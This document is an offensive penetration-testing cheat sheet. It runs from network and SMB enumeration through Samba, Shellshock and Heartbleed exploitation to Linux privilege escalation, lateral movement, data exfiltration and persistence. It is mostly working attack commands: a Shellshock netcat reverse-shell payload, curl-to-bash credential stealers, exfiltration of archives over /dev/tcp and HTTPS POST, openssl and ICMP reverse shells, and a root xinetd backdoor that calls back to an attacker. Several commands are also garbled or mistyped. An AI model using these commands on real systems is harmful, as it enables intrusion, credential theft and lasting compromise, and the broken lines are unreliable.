OS Fingerprinting
	nmap -O --osscan-guess <IP Addreess>
	nmap -v -sT -O <IP Addreess>
	nmap -v -sS -sU -sV -n <IP Addreess>
NFS Protocol on port 2048
	nmap -sT -sU -sV -p2049 <IP Addr>
	nmap --script nfs-ls,nfs-showmount,nfs-statfs <IP Addreess>
	showmount -e <IP Address>
	mkdir -p /mnt/home/bob
	mount -t nfs <NFS Server IP Address>:/home/bob /mnt/home/bob -o nolock
	cd /mnt/home/bob && ls -la	
RPCBind Protocol <Portmapper> on port 111 or 32771	
	nmap --script rpc-grind,rpcinfo <IP Address> -p 111 			#Can be used to enumerate the portmapper and its associated services
	rpcinfo -p <IP Address>											#Can be used to enumerate the portmapper and its associated services
SMB Protocol <SAMBA> on port 137,138,139,445 TCP and UDP
	nmap -sT -sU -sV <IP Address> -p135,137,138,139,445 --open
	SMB Share Enumeration
		nmap --script-smb-enum-shares <IP Address>
		smbclient -L <IP Address>
		smbmap -H <IP Address>
		smbclient \\\\<IP Address>\\<Shared Folder>
		mkdir /mnet/wwww
		mount -t cifs \\\\<IP Address>\wwww /mnt/wwww
		cd /mnt/www && ls -la

	SMB User Enumeration	
	Scenario - 01: Bash for loop and rpcclient
		touch users.txt
		cat users.txt
		for u in $(cat users.txt);
			do rpcclient -U "" <IP Address> -N \
			--command="lookupnames $u";
		done | grep "User: 1"
		rpcclient -U "" <IP Address> -N
		lookupnames <user name guess>
	Scenario - 02: 
		enum4linux <IP Address>
SMTP Protocol
	telnet <IP Address> 25
	nc <IP Address> 25
	HELO tester.localdomain
	RCPT TO root@server.localdomain
	MAIL FROM tester@tester.localdomain
	VRFY <user name>
	EXPN <user name>
	smtp-user-enum -M VRFY -U users.txt -t <IP Address>
	smtp-user-enum -M EXPN -u admin -t <IP Address>
	smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
	smtp-user-enum -M EXPN -D example.com -U users.txt -t <IP Address>	
DNS Protocol
	ns -type=ns <domain name>
	subbrute <domain name>
	dnsrecon <domain name>
	dig @nameserver axfr <domain name>
SNMP Protocol

Network Information
	ifconfig -a
	route -n
	traceroute -n <IP Address>
	cat /etc/resolv.conf
	arp -en
	arp -a 								<List ARP Cache>
	netstat -auntp						<Established and Listening TCP/UDP Port Connection>
	ss -twurp							<Listing active connections, process, users, bytes>
	nmap -sT -p4444-4450 portquiz.net 	<tbound Port Connectivity>
	nmap -sT -p5555 portquiz.net 		<Checking outbound firewall rule>
System Information
	uname -a
	grep $USER /etc/passwd
	for user $(cat /etc/passwd | cut -f1 -d":"); do id $user; done <All user including UID and GID>
	cat /etc/passwd | cut -f1,3,4 -d":" | grep "0:0" | cut -f1 -d":" | awk '{print $1} <List all UID 0 or root account>
	cat /etc/passwd
	cat /etc/shadow
	sudo -l 							<What can we sudo without a password?>
	cat /etc/sudoers					<Can we read the /etc/sudoers>
	cat /root/.bash_history				<Can we read .bash_history file?>
	find /home/* -name *.*history* - print 2 > /dev/null 	<Can we read any other users .bash_history files?>
	cat /etc/issue
	cat /etc/*-release
	sudo -l | grep vim
	sudo -l | grep nmap
	sudo -l | grep vi
	ls -als /root/											<Can we list root's home directory>
	echo $PATH 												<Current $PATH Environment Variable>
	cat /etc/crontab && ls -als /etc/cron*  				<List all cron jobs>
	find /etc/cron* -type f -perm -o+w -exec ls -l () \;	<Find world writable cron jobs>
	ps auxwww												<List running process>
	ps -u root												<List all process running as a root>
	ps -u $USER 											<List all process running as a current user>
	find / -perm -4000 2 > /dev/null				<Find SUID Files>
	find / -uid 0 -perm -4000 -type f 2 > /dev/null			<Find SUID files owned by root>
	find / -perm -2000 -type -f 2 > /dev/null				<Find GUID Files>
	find -perm -2 -type f 2 > /dev/null						<Find world-writable files>
	ls -la /etc/*.conf										<List all conf files /etc/ >
	grep pass* /etc/*.conf									<Find conf files tnat contain the string "pass">
	lsof -n 												<List open files>
	dpkg -l
	sudo -V 												<Common Software Version>
	httpd -v												<Common Software Version>
	apache2 -v 												<Common Software Version>
	mysql -v 												<Common Software Version>
	ps aux | awk '{print $11}' | xargs -r ls -la 2 > /dev/null | awk '!x[$0]++' 	<Print process binaries/path and permission>
	find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null

<01. Password Spray Attack> [is to reverse the process, and instead, introduce a list of as many sers as possible, while trying just a single password attempt against tens or hundreds of user accounts.]
	smtp-user-enum 															<To enumerate users and build users.txt>
	https://github.com/insidetrust/statistically-likely-usernames 			<To develop users.txt>
	head -n 50 john.txt >> users.txt
	msf> use auxiliary/scanner/smtp/smtp_enum   							<To confirm user validity>
	nmap -sT <IP Address> --open --max-retries 1 -n
	hydra -L users.txt -P password.txt ssh://<IP Address>
	hydra -l david -p Spring2018 -M ssh_servers.txt ssh 					<To find others target of SSH Server>

<02. Exploiting Samba>
	<Samba Cry Vulnerability CVE-2007-2447>
	nmap --script smb-os-discovery -p445 <IP Address>
	https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script 	<Samba Cry Vulnerability CVE-2007-2447>
	https://www.samba.org/samba/security/CVE-2007-2447.html 				<Samba Cry Vulnerability CVE-2007-2447>
	msf> use exploit/multi/samba/usermap_script
	python -c 'import pty;pty.spawn("/bin/sh")'

	<Samba Symlink Directory Traversal>
	https://www.samba.org/samba/news/symlink_attack.html 					<Samba Symlink Directory Traversal>
	smbmap -H <IP Address>													<To find writable share folder, ” command to determine shares available to us on a Samba server>
	msf>use auxiliary/admin/smb/samba_symlink_traversal						<To create the symlink to the root filesystem>
	smbclient \\\\<IP Address>\\<Writable Share Folder>
	smb:rootfs tmp rootfs \\> cd etc
	smb:rootfs tmp rootfs etc \\> tar c ../ tmp /all_files.tar
	root@tester# tar xf tmp /all_files.tar
	root@tester# cd tmp rootfs tmp rootfs /
	root@tester# grep r "password" * 2>&1 /dev/null

	<Certain situations where we have a fully patched Samba server, but have a writeable share available to us>
	nmap --script smb os discovery <IP Address> -p445
	smbmap -H <IP Address>
	smbclient \\\\<IP Address>\\<Share Folder> -N
	smb:\\> put test.pl
	{#!/usr/ perl
	print "Content type: text/html n n";
	smb:\\> put perl-reverse-shell.pl 										<download from http://pentestmonkey.net/tools/web-shells/perl-reverse-shell>
	nc -lvnp 1234
<03. Exploiting Shellshock [CVE-2014-6271] >

	env x=‘() { :;}; echo vulnerable’ bash c “echo this is a test”																						<To identify shellshock vulnerability>
	./dirsearch.py -u http://<IP Address>/ -e cgi -r 																									<To find any CGI files>
	nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi <IP Address> -p 80																<To Identify Shellshock vulnerability>
	wget -U "() { foo;};echo \\"Content type: text/plain \\"; echo; echo;/bin/cat /etc/passwd" http://<IP Address>/cgi-bin/login.cgi && cat login.cgi
	wget -U "() { foo;};echo; /bin/ nc <IP Address> -e /bin/ sh " http://<IP Address>/cgi bin/login.cgi 												<To execute reverse shell payload>
<04. Exploiting Heartbleed>
	nmap --script=ssl-heartbleed <IP Address>							<To identify Heartbleed vulnerability>
	msf>use auxiliary/scanner/ssl/openssl_heartbleed/show actions		<To dump private key>
	cd ~/.msf4/loot														<To change directory of the dump result>
	string <file.bin>													<TO read ny private key leak>
<05. Exploiting Java RMI Registry>
	nmap -sT -sV <IP Address>											<If "GNU Classpath grmiregistry " identified on port 1099 then Java RMI Rgistry vulnerability exist> 
	msf>use exploit/multi/misc/java_rmi_server							<To exploit vulnerability>
	python -c 'import pty;pty.spawn("/bin/sh")'							<To upgrade limited shell>
<06. Exploiting Java Deserialization>
	nmap -sT <IP Address>
<07. Exploiting Tomca>
	nmap -sT <IP Address>												<To identify tomcat manager available in the port 8180>
	msf> use auxiliary/scanner/http/tomcat_mgr_login					<To find valid credental to Tomcat Manager>

<01. Privilege Escalation>
	System and Network Information:
		Kernel Version
		Operating System
		IP Address
		Running Process
		Network Routes
		DNS Server
		ARP Cache
		Current Network Connection
	User Information
		Current User Permission
		UID and GID Information for all users
		Last logged on users
		Root Accounts
		Service accounts
		Home Directories		
	Priviledge Access
		Can the current user execute anything with elevated priviledge?
		Are there any setuid root (SUID) binaries on the system which may be vulnerable to priviledge escalation?
		Can we read sensitive information files that might contain sensitive information, password, etc?
		Can we read the shadow files? Can we crack the hash?
		Can we read or lost the contents pf the /root directory?
		Can we write to directories that configured to serve web pages?
		Are service configuration files readable or modifiable by current user?
		Can we modify the configuration of a service in such a way that gives us elevated priviledge?
		Do the configuration files contain any information we can use to our advantage? 
		What tasks or jobs is the system configured to run and at which times?
		Are there any custom jobs or tasks configured as root that word writable?
		Can we modify any of the existing tasks at all?
	Installed Software Version Information
		What software packages are installed on the system?
		What versions? Are the versions installed out of date and ulnerable to existing available exploits?
		Does any of the installed software allow us to modify their onfiguration files and could this result in gaining privileged ccess to the system?
	<01> Cleartext Credential in Configuration Files
			msf> use post/linux/gather/enum_configs
			msf> use post/linux/gather/enum_system
	<02> SUID Binaries
			find / -perm -4000 -type f 2 >/dev/null
			msf> use exploit/linux/local/glibc_origin_expansion_priv_esc
			nmap --interactive then type !sh
	<03> SUDO Privileged Access
		Definition: Sudo is used to provide privileged access to users on a temporary basis, allowing users to run commands as another user (usually root), and when that elevated access is required, a user can simply run “ sudo command ”.
			sudo -l   							<To retrive sudoers status>
			less (!sh)
			more (!sh)
			vi/vim (!sh)
			nmap --interactive + !sh
			ftp (!sh)
			gdb (!sh)
			man -P "id" man       				<To display our UID and GID>
		sudo man -P "cat /etc/shadow" man
	<04> Restrictied Shell
			find /home/bob -name test -exec /bin/sh
			python -c 'import pty;pty.spawn("/bin/sh")'
			perl -e 'exec "/bin/sh"'
	<05> Cracking the shadow
			unshadow passwd shadow > shadow.john
			john shadow.john --wordlist=/usr/share/wordlist/custom_words.txt
			swapon -s
			python mimipenguin.py
	<06> Pilfering credential from Swap Memory
			swapon -s 			<To Find Swap Memory File>
			cat /proc/swaps
			string <partition name> | grep "password="
			string <partition name> | grep "&password="
	<07> Code Execution via Shared Object Library Loading
		a. Determine the shared objects that are being loaded by an executable.
		b. Determine if the application was compiled with RPATH or RUNPATH options. If yes, can we write into the locations specified by the either of those options?
			ldd /user/local/program 
			objdump x /usr/local/bin/program | grep RPATH
			objdump x /usr/local/bin/program | grep RUNPATH
			msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker LPORT> -f elf-so -o program.so
			python -m SimpleHTTPServer 80
			cd /tmp/program/libs && wget http://attacker_ip/program.so
			msf> use exploit/multi/handler
	<08> Kernel Exploit
			uname -a
			perl Linux_Exploit_Suggester.pl -k <kernel version>
			gcc -m32 exploit.c -o exploit
	<09> Unix Socket Exploitation
<02. Lateral Movement>
	Lateral Movement involves moving throughout the target organization from machine to machine, server to server using
	credentials we obtain through other phases, and furtherstrengthening our foothold within the target infrastructure to the ultimate objective which is defined by the customer.
	<01> SSH Hijacking
		ps aux | grep sshd 							<Find the SSHD Process ID on the victim>
		grep SSH_AUTH_SOCK /proc/<pid>/environ 		<Looking SSH_AUTH_SOCK in environment variable at the victim>
		SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add -l 	<Hijacking ssh-agent scoket>
		ssh <IP Address> -l victim
	<02> Stealing SSH Credential
		Attacker side:
		git clone https://github.com/mthbernardes/sshLooter.git
		cd sshlooter
		python -m SimpleHTTPServer
		Victim Side:
		curl http://<IP Address>:8000/install.sh | bash
	<03> Samba Secrets to Domain Admin
		/var/lib/samba/private 									 <When a new samba user is created, the information will store in this location>
		tdbdump	/var/lib/samba/private/secrets.tdb 				 <Use tdbdump to dump the information from secrets.tdb>
		https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9 <Step by step instruction>
		https://github.com/byt3bl33d3r/pth-toolkit 				 <pth-smbclient is a tool for pass the hash to the Active Directory>
	<04> VPNPivot
		Attacker Side

		Victim Side		
	<05> Dumping Stored Firefox Credential
		git clone https://github.com/unode/firefox_decrypt/blob/master/firefox_decrypt.py
		cd firefox_decrypt
		python -m SimpleHTTPServer
		curl http://<IP Address>:8000/firefox_decrypt.py
		python firefox_decrypt.py
		Note: This tool will only work if the Master Password has not been set.
<03. Data Exfiltration>
	<01> Exfil over TCP Socket with EBCDIC and Base64
		nc -nlvp 80 > datafolder.tmp 																<Step-01: Setup attacker machine to recive the stolen data>
		tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<IP Address>/80 				<Step-02: compress, encode with base64 and ebcdic and redirect to the attacker machine>
		dd=conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar 								<Step-03: decode ebcdic to ascii, decode to base64 and redirect the output to the destination folder>
		tar xf datafolder.tar 																		<Step-04: decompress the result>
	<02> Exfil over SSH
		tar zcf - /tmp/datafolder | ssh root@<IP Address>"cd /tmp;tar zxpf -"
	<03> Exfil via POST Request over HTTPS
		<?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?>		<Step-01:  Setup file at the attacker that receive the stolen data>
		curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<IP Address>/contact.php 		<Step-02:  compress and encode, then sending with POST method with curl>
		cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar 			<Step-03L  decode and decompress and redirecting to the destination folder>
<04. Maintaining Access and Persistence>
	<01> Reverse Shell for Maintaining Access

		<Openssl Reverse Shell>
		#At The Attacker Side:
		openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes								<Step-01: To generate an SSL Certificate key pair>
		openssl s_server -quiet -key key.pem -cert cert.pem -port 443													<Step-02: To listen at the SSL Port or 443>
		#At The Victim Side:
		mkfifo /tmp/x; /bin/sh -i < /tmp/x 2>&1 | openssl s_client -quiet -connect <IP Address>:443 > /tmp/x; rm /tmp/x <Step-03: To Connect back to Attacker machine> 
		<ICMP Reverse Shell>

		#At the Attacker Side (Master):
		git clone https://github.com/inquisb/icmpsh
		cd icmpsh
		sysctl -w net.ipv4.icmp_echo_ignore_all=1sysctl
		./icmpsh_m.py <Attacker IP Address> <Victim IP Address>

		#At Victim Side (Slave):
		icmpsh.exe -t <Attacker IP Address> -d 500 -b 30 -s 128

	<02> Custom Service for Persistance

		<Xinetd UDP Portknock Backdoor>

			<Step-01:> To create custom xinetd backdoor on the target with the following shell script:

				cp /bin/nc /bin/services-udp
				echo "service services-udp" >/etc/xinetd.d/services-udp
				echo "{" >> /etc/xinetd.d/services-udp
				echo "		server = /bin/services-udp" >> /etc/xinetd.d/services-udp
				echo "		server_args = <attacker_IP> <attacker_PORT> -e /bin/bash" >> /etc/xinetd.d/services-udp
				echo "		protocol = udp" >> /etc/xinetd.d/services-udp
				echo "		user = root" >> /etc/xinetd.d/services-udp
				echo "		socket_type = dgram" >> /etc/xinetd.d/services-udp
				echo "		wait = yes" >> /etc/xinetd.d/services-udp
				echo "		flags = IPv4" >> /etc/xinetd.d/services-udp
				echo "}" >> /etc/xinetd.d/services-udp

				echo "services-udp	65534/udp       # services-udp" >> /etc/services

				/etc/init.d/xinetd stop
				/etc/init.d/xinetd start

			<Step-02:> Setup a netcat listener in the same port like in the script
				nc -lvnp 4444

			<Step-03:> Geberate single UDP Packet then send to the victim machine
				hping3 -2 -c 1 <Victim IP Address> -p 65534